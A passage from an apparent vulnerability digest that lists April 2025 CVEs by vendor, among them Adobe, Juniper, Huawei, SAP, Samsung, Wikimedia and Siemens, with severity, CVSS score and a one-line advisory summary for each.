CVE-2025-30288 | High | 8.2 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. |
CVE-2025-30287 | High | 8.2 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Authentication vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30294 | Medium | 6.8 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass. |
CVE-2025-30293 | Medium | 6.8 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass. |
CVE-2025-30292 | Medium | 6.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. |
CVE-2025-30291 | Medium | 5.5 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Information Exposure vulnerability that could result in a security feature bypass. |
CVE-2025-30309 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30308 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30307 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30306 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30305 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27205 | Medium | 5.4 | — | 2025-04-08 | Adobe Experience Manager Screens versions FP11.3 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. |
CVE-2025-27191 | Medium | 5.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. |
CVE-2025-27190 | Medium | 5.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. |
CVE-2025-27189 | Medium | 4.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by a Cross-Site Request Forgery (CSRF) vulnerability that could be exploited to cause a denial-of-service condition. |
CVE-2025-27188 | Medium | 4.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Improper Authorization vulnerability that could result in Privilege escalation. |
CVE-2025-27192 | Low | 2.7 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Insufficiently Protected Credentials vulnerability that could lead to a security feature bypass. |
N/a · 22 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-55210 | Critical | 9.8 | — | 2025-04-09 | An issue in TOTVS Framework (Linha Protheus) 12.1.2310 allows attackers to bypass multi-factor authentication (MFA) via a crafted websocket message. |
CVE-2025-28413 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the SysDictTypeController component |
CVE-2025-28412 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the /editSave method in SysNoticeController |
CVE-2025-28411 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the editSave method in /tool/gen/editSave |
CVE-2025-28410 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the cancelAuthUserAll method does not properly validate whether the requesting user has administrative privileges |
CVE-2025-28408 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the selectDeptTree method of the /selectDeptTree/{deptId} endpoint does not properly validate the deptId parameter |
CVE-2025-28406 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the jobLogId parameter |
CVE-2025-28405 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the changeStatus method |
CVE-2025-28402 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the jobId parameter |
CVE-2025-28409 | High | 8.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the add method of the /add/{parentId} endpoint does not properly validate whether the requesting user has permission to add a menu item under the specified paren… |
CVE-2025-28407 | High | 8.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the edit method of the /edit/{dictId} endpoint does not properly validate whether the requesting user has permission to modify the specified dictId |
CVE-2025-29394 | High | 8.1 | — | 2025-04-09 | An insecure permissions vulnerability in verydows v2.0 allows a remote attacker to execute arbitrary code by uploading a file type. |
CVE-2025-28403 | High | 7.2 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the editSave method does not properly validate whether the requesting user has administrative privileges before allowing modifications to system configuration se… |
CVE-2025-28401 | Medium | 6.7 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the menuId parameter |
CVE-2025-28400 | Medium | 6.7 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the postID parameter in the edit method |
CVE-2025-29482 | Medium | 6.2 | — | 2025-04-07 | Buffer Overflow vulnerability in libheif 1.19.7 allows a local attacker to execute arbitrary code via the SAO (Sample Adaptive Offset) processing of libde265. |
CVE-2025-29389 | Medium | 6.1 | — | 2025-04-09 | PbootCMS v3.2.9 contains a XSS vulnerability in admin.php?p=/Content/index/mcode/2#tab=t2. |
CVE-2025-29594 | Medium | 6.1 | — | 2025-04-07 | A vulnerability exists in the errorpage.php file of the CS2-WeaponPaints-Website v2.1.7 where user-controlled input is not adequately validated before being processed. |
CVE-2025-29480 | Medium | 5.5 | — | 2025-04-07 | Buffer Overflow vulnerability in gdal 3.10.2 allows a local attacker to cause a denial of service via the OGRSpatialReference::Release function. |
CVE-2025-29478 | Medium | 5.5 | — | 2025-04-07 | An issue in fluent-bit v.3.7.2 allows a local attacker to cause a denial of service via the cfl_list_size in cfl_list.h:165. |
CVE-2024-46494 | Medium | 5.4 | — | 2025-04-07 | A cross-site scripting (XSS) vulnerability in Typecho v1.2.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into Name parameter under a comment for an Article. |
CVE-2025-3397 | Medium | 4.3 | — | 2025-04-08 | A vulnerability classified as problematic has been found in YzmCMS 7.1. |
Juniper · 21 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30660 | High | 7.5 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (pfe) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS).When… |
CVE-2025-30659 | High | 7.5 | — | 2025-04-09 | An Improper Handling of Length Parameter Inconsistency vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30658 | High | 7.5 | — | 2025-04-09 | A Missing Release of Memory after Effective Lifetime vulnerability in the Anti-Virus processing of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30656 | High | 7.5 | — | 2025-04-09 | An Improper Handling of Additional Special Element vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series with MS-MPC, MS-MIC and SPC3, and SRX Series, allows an unauthenticated, network-based attacke… |
CVE-2025-30651 | High | 7.5 | — | 2025-04-09 | A Buffer Access with Incorrect Length Value vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). |
CVE-2025-30649 | High | 7.5 | — | 2025-04-09 | An Improper Input Validation vulnerability in the syslog stream TCP transport of Juniper Networks Junos OS on MX240, MX480 and MX960 devices with MX-SPC3 Security Services Card allows an unauthenticated, network-based attacker, to send spe… |
CVE-2025-30645 | High | 7.5 | — | 2025-04-09 | A NULL Pointer Dereference vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker causing specific, valid control traffic to be sent out of a Dual-Stack (DS) Lite tunnel to crash the flowd pr… |
CVE-2025-30644 | High | 7.5 | — | 2025-04-09 | A Heap-based Buffer Overflow vulnerability in the flexible PIC concentrator (FPC) of Juniper Networks Junos OS on EX2300, EX3400, EX4100, EX4300, EX4300MP, EX4400, EX4600, EX4650-48Y, and QFX5k Series allows an attacker to send a specific… |
CVE-2025-21601 | High | 7.5 | — | 2025-04-09 | An Improper Following of Specification by Caller vulnerability in web management (J-Web, Captive Portal, 802.1X, Juniper Secure Connect (JSC) of Juniper Networks Junos OS on SRX Series, EX Series, MX240, MX480, MX960, QFX5120 Series, allow… |
CVE-2025-21594 | High | 7.5 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the pfe (packet forwarding engine) of Juniper Networks Junos OS on MX Series causes a port within a pool to be blocked leading to Denial of Service (DoS). |
CVE-2025-30648 | High | 7.4 | — | 2025-04-09 | An Improper Input Validation vulnerability in the Juniper DHCP Daemon (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause the jdhcpd process to crash resulting in a Denial of Ser… |
CVE-2025-21591 | High | 7.4 | — | 2025-04-09 | A Buffer Access with Incorrect Length Value vulnerability in the jdhcpd daemon of Juniper Networks Junos OS, when DHCP snooping is enabled, allows an unauthenticated, adjacent, attacker to send a DHCP packet with a malformed DHCP option to… |
CVE-2025-30653 | Medium | 6.5 | — | 2025-04-09 | An Expired Pointer Dereference vulnerability in Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause Denial of Service (DoS).On all Junos OS and Junos OS Evol… |
CVE-2025-30647 | Medium | 6.5 | — | 2025-04-09 | A Missing Release of Memory after Effective Lifetime vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated adjacent attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30646 | Medium | 6.5 | — | 2025-04-09 | A Signed to Unsigned Conversion Error vulnerability in the Layer 2 Control Protocol daemon (l2cpd) of Juniper Networks Junos OS and Juniper Networks Junos OS Evolved allows an unauthenticated adjacent attacker sending a specifically malfor… |
CVE-2025-21595 | Medium | 6.5 | — | 2025-04-09 | A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause an FPC to crash, leading to De… |
CVE-2025-30655 | Medium | 5.5 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30654 | Medium | 5.5 | — | 2025-04-09 | An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged, authenticated attacker with access to the CLI to acces… |
CVE-2025-30652 | Medium | 5.5 | — | 2025-04-09 | An Improper Handling of Exceptional Conditions vulnerability in routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker executing a CLI command to cause a Denial of Service (D… |
CVE-2025-30657 | Medium | 5.3 | — | 2025-04-09 | An Improper Encoding or Escaping of Output vulnerability in the Sampling Route Record Daemon (SRRD) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). |
CVE-2025-21597 | Medium | 5.3 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, logically adjacent BGP peer to cause Denial of Service (DoS… |
Huawei · 20 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31173 | High | 8.8 | — | 2025-04-07 | Memory write permission bypass vulnerability in the kernel futex module Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2025-31175 | High | 8.4 | — | 2025-04-07 | Deserialization mismatch vulnerability in the DSoftBus module Impact: Successful exploitation of this vulnerability may affect service integrity. |
CVE-2025-31170 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58127 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58126 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58125 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58124 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2025-31172 | High | 7.8 | — | 2025-04-07 | Memory write permission bypass vulnerability in the kernel futex module Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2024-58112 | High | 7.5 | — | 2025-04-07 | Exception capture failure vulnerability in the SVG parsing module of the ArkUI framework Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58111 | High | 7.5 | — | 2025-04-07 | Exception capture failure vulnerability in the SVG parsing module of the ArkUI framework Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58107 | High | 7.5 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2025-31174 | Medium | 6.8 | — | 2025-04-07 | Path traversal vulnerability in the DFS module Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2025-31171 | Medium | 6.8 | — | 2025-04-07 | File read permission bypass vulnerability in the kernel file system module Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2024-58113 | Medium | 5.3 | — | 2025-04-07 | Vulnerability of improper resource management in the memory management module Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58110 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58109 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58108 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58106 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58116 | Medium | 4.0 | — | 2025-04-07 | Buffer overflow vulnerability in the SVG parsing module of the ArkUI framework Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58115 | Medium | 4.0 | — | 2025-04-07 | Buffer overflow vulnerability in the SVG parsing module of the ArkUI framework Impact: Successful exploitation of this vulnerability may affect availability. |
Sap_se · 16 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31330 | Critical | 9.9 | — | 2025-04-08 | SAP Landscape Transformation (SLT) allows an attacker with user privileges to exploit a vulnerability in the function module exposed via RFC. |
CVE-2025-27429 | Critical | 9.9 | — | 2025-04-08 | SAP S/4HANA allows an attacker with user privileges to exploit a vulnerability in the function module exposed via RFC. |
CVE-2025-30016 | Critical | 9.8 | — | 2025-04-08 | SAP Financial Consolidation allows an unauthenticated attacker to gain unauthorized access to the Admin account. |
CVE-2025-23186 | High | 8.5 | — | 2025-04-08 | In certain conditions, SAP NetWeaver Application Server ABAP allows an authenticated attacker to craft a Remote Function Call (RFC) request to restricted destinations, which can be used to expose credentials for a remote service. |
CVE-2025-30014 | High | 7.7 | — | 2025-04-08 | SAP Capital Yield Tax Management has directory traversal vulnerability due to insufficient path validation. |
CVE-2025-27428 | High | 7.7 | — | 2025-04-08 | Due to directory traversal vulnerability, an authorized attacker could gain access to some critical information by using RFC enabled function module. |
CVE-2025-26654 | Medium | 6.8 | — | 2025-04-08 | SAP Commerce Cloud (Public Cloud) does not allow to disable unencrypted HTTP (port 80) entirely, but instead allows a redirect from port 80 to 443 (HTTPS). |
CVE-2025-30013 | Medium | 6.7 | — | 2025-04-08 | SAP ERP BW Business Content is vulnerable to OS Command Injection through certain function modules. |
CVE-2025-26657 | Medium | 5.3 | — | 2025-04-08 | SAP KMC WPC allows an unauthenticated attacker to remotely retrieve usernames by a simple parameter query which could expose sensitive information causing low impact on confidentiality of the application. |
CVE-2025-26653 | Medium | 4.7 | — | 2025-04-08 | SAP NetWeaver Application Server ABAP does not sufficiently encode user-controlled inputs, leading to Stored Cross-Site Scripting (XSS) vulnerability. |
CVE-2025-30017 | Medium | 4.4 | — | 2025-04-08 | Due to a missing authorization check, an authenticated attacker could upload a file as a template for solution documentation in SAP Solution Manager 7.1. |
CVE-2025-31333 | Medium | 4.3 | — | 2025-04-08 | SAP S4CORE OData meta-data property is vulnerable to data tampering, due to which entity set could be externally modified by an attacker causing low impact on integrity of the application. |
CVE-2025-31331 | Medium | 4.3 | — | 2025-04-08 | SAP NetWeaver allows an attacker to bypass authorization checks, enabling them to view portions of ABAP code that would normally require additional validation. |
CVE-2025-27437 | Medium | 4.3 | — | 2025-04-08 | A Missing Authorization Check vulnerability exists in the Virus Scanner Interface of SAP NetWeaver Application Server ABAP. |
CVE-2025-27435 | Medium | 4.2 | — | 2025-04-08 | Under specific conditions and prerequisites, an unauthenticated attacker could access customer coupon codes exposed in the URL parameters of the Coupon Campaign URL in SAP Commerce. |
CVE-2025-30015 | Medium | 4.1 | — | 2025-04-08 | Due to incorrect memory address handling in ABAP SQL of SAP NetWeaver and ABAP Platform (Application Server ABAP), an authenticated attacker with high privileges could execute certain forms of SQL queries leading to manipulation of content… |
Code-projects · 15 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3345 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3344 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3343 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3342 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3341 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3340 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3339 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3338 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3334 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3333 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3332 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3331 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3330 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3348 | Medium | 6.3 | — | 2025-04-07 | A vulnerability classified as critical was found in code-projects Patient Record Management System 1.0. |
CVE-2025-3347 | Medium | 6.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in code-projects Patient Record Management System 1.0. |
Samsung · 15 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20946 | High | 8.8 | — | 2025-04-08 | Improper handling of exceptional conditions in pairing specific bluetooth devices in Galaxy Watch Bluetooth pairing prior to SMR Apr-2025 Release 1 allows local attackers to pair with specific bluetooth devices without user interaction. |
CVE-2025-20936 | High | 8.8 | — | 2025-04-08 | Improper access control in HDCP trustlet prior to SMR Apr-2025 Release 1 allows local attackers with shell privilege to escalate their privileges to root. |
CVE-2025-20943 | Medium | 6.4 | — | 2025-04-08 | Out-of-bounds write in secfr trustlet prior to SMR Apr-2025 Release 1 allows local privileged attackers to cause memory corruption. |
CVE-2025-20944 | Medium | 6.2 | — | 2025-04-08 | Out-of-bounds read in parsing audio data in libsavsac.so prior to SMR Apr-2025 Release 1 allows local attackers to read out-of-bounds memory. |
CVE-2025-20941 | Medium | 6.2 | — | 2025-04-08 | Improper access control in InputManager to SMR Apr-2025 Release 1 allows local attackers to access the scancode of specific input device. |
CVE-2025-20952 | Medium | 5.5 | — | 2025-04-09 | Improper access control in Mdecservice prior to SMR Apr-2025 Release 1 allows local attackers to access arbitrary files with system privilege. |
CVE-2025-20948 | Medium | 5.5 | — | 2025-04-08 | Out-of-bounds read in enrollment with cdsp frame secfr trustlet prior to SMR Apr-2025 Release 1 allows local privileged attackers to read out-of-bounds memory. |
CVE-2025-20947 | Medium | 5.5 | — | 2025-04-08 | Improper handling of insufficient permission or privileges in ClipboardService prior to SMR Apr-2025 Release 1 allows local attackers to access image files across multiple users. |
CVE-2025-20938 | Medium | 5.5 | — | 2025-04-08 | Improper access control in SamsungContacts prior to SMR Apr-2025 Release 1 allows local attackers to access protected data in SamsungContacts. |
CVE-2025-20934 | Medium | 5.5 | — | 2025-04-08 | Improper access control in Sticker Center prior to SMR Apr-2025 Release 1 allows local attackers to access image files with system privilege. |
CVE-2025-20939 | Medium | 5.4 | — | 2025-04-08 | Improper authorization in wireless download protocol in Galaxy Watch prior to SMR Apr-2025 Release 1 allows physical attackers to update device unique identifier of Watch devices. |
CVE-2025-20951 | Medium | 5.1 | — | 2025-04-08 | Improper verification of intent by broadcast receiver vulnerability in Galaxy Store prior to version 4.5.90.7 allows local attackers to write arbitrary files with the privilege of Galaxy Store. |
CVE-2025-20942 | Medium | 4.4 | — | 2025-04-08 | Improper Verification of Intent by Broadcast Receiver in DeviceIdService prior to SMR Apr-2025 Release 1 allows local attackers to reset OAID. |
CVE-2025-20950 | Medium | 4.0 | — | 2025-04-08 | Use of implicit intent for sensitive communication in SamsungNotes prior to version 4.4.26.45 allows local attackers to access sensitive information. |
CVE-2025-20945 | Medium | 4.0 | — | 2025-04-08 | Improper access control in Galaxy Watch prior to SMR Apr-2025 Release 1 allows local attackers to access sensitive information of Galaxy watch. |
The Wikimedia Foundation · 14 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32079 | Medium | 6.5 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - GrowthExperiments allows HTTP DoS.This issue affects Mediawiki - GrowthExperiments: from 1.39 through 1.43. |
CVE-2025-32074 | Medium | 5.4 | — | 2025-04-11 | Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki - Confirm Account Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Confirm Account Extension: from 1.39 through 1.43. |
CVE-2025-32073 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - HTML Tags allows Cross-Site Scripting (XSS).This issue affects Mediawiki - HTML Tags: from 1.39 through 1.43. |
CVE-2025-32071 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Wikidata Extension allows Cross-Site Scripting (XSS) from widthheight message via ImageHandler::getDimensionsString()This issue affects Mediawiki - Wikidata Ex… |
CVE-2025-32070 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - AJAX Poll Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - AJAX Poll Extension: from 1.39 through 1.43. |
CVE-2025-32069 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Wikibase Media Info Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Wikibase Media Info Extension: from 1.39 through 1.43. |
CVE-2025-32068 | Medium | 5.4 | — | 2025-04-11 | Incorrect Authorization vulnerability in The Wikimedia Foundation Mediawiki - OAuth Extension allows Authentication Bypass.This issue affects Mediawiki - OAuth Extension: from 1.39 through 1.43. |
CVE-2025-32067 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Growth Experiments Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Growth Experiments Extension: from 1.39 through 1.43. |
CVE-2025-32080 | — | — | — | 2025-04-11 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in The Wikimedia Foundation Mediawiki - Mobile Frontend Extension allows Shared Resource Manipulation.This issue affects Mediawiki - Mobile Frontend Extension: from 1… |
CVE-2025-32078 | — | — | — | 2025-04-11 | Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki - Version Compare Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Version Compare Extension: from 1.39 through 1.43. |
CVE-2025-32077 | — | — | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Extension:SimpleCalendar allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Extension:SimpleCalendar: from 1.39 through 1.43. |
CVE-2025-32076 | — | — | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Visual Data Extension allows HTTP DoS.This issue affects Mediawiki - Visual Data Extension: from 1.39 through 1.43. |
CVE-2025-32075 | — | — | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Tabs Extension allows Code Injection.This issue affects Mediawiki - Tabs Extension: from 1.39 through 1.43. |
CVE-2025-32072 | — | — | — | 2025-04-11 | Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki Core - Feed Utils allows WebView Injection.This issue affects Mediawiki Core - Feed Utils: from 1.39 through 1.43. |
Siemens · 13 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-41794 | Critical | 10.0 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-54092 | Critical | 9.8 | — | 2025-04-08 | A vulnerability has been identified in Industrial Edge Device Kit - arm64 V1.17 (All versions), Industrial Edge Device Kit - arm64 V1.18 (All versions), Industrial Edge Device Kit - arm64 V1.19 (All versions), Industrial Edge Device Kit -… |
CVE-2024-41790 | Critical | 9.1 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41789 | Critical | 9.1 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41788 | Critical | 9.1 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41793 | High | 8.6 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41792 | High | 8.6 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41791 | High | 7.3 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2025-30000 | Medium | 6.7 | — | 2025-04-08 | A vulnerability has been identified in Siemens License Server (SLS) (All versions < V4.3). |
CVE-2025-29999 | Medium | 6.7 | — | 2025-04-08 | A vulnerability has been identified in Siemens License Server (SLS) (All versions < V4.3). |
CVE-2024-41796 | Medium | 6.5 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41795 | Medium | 6.5 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
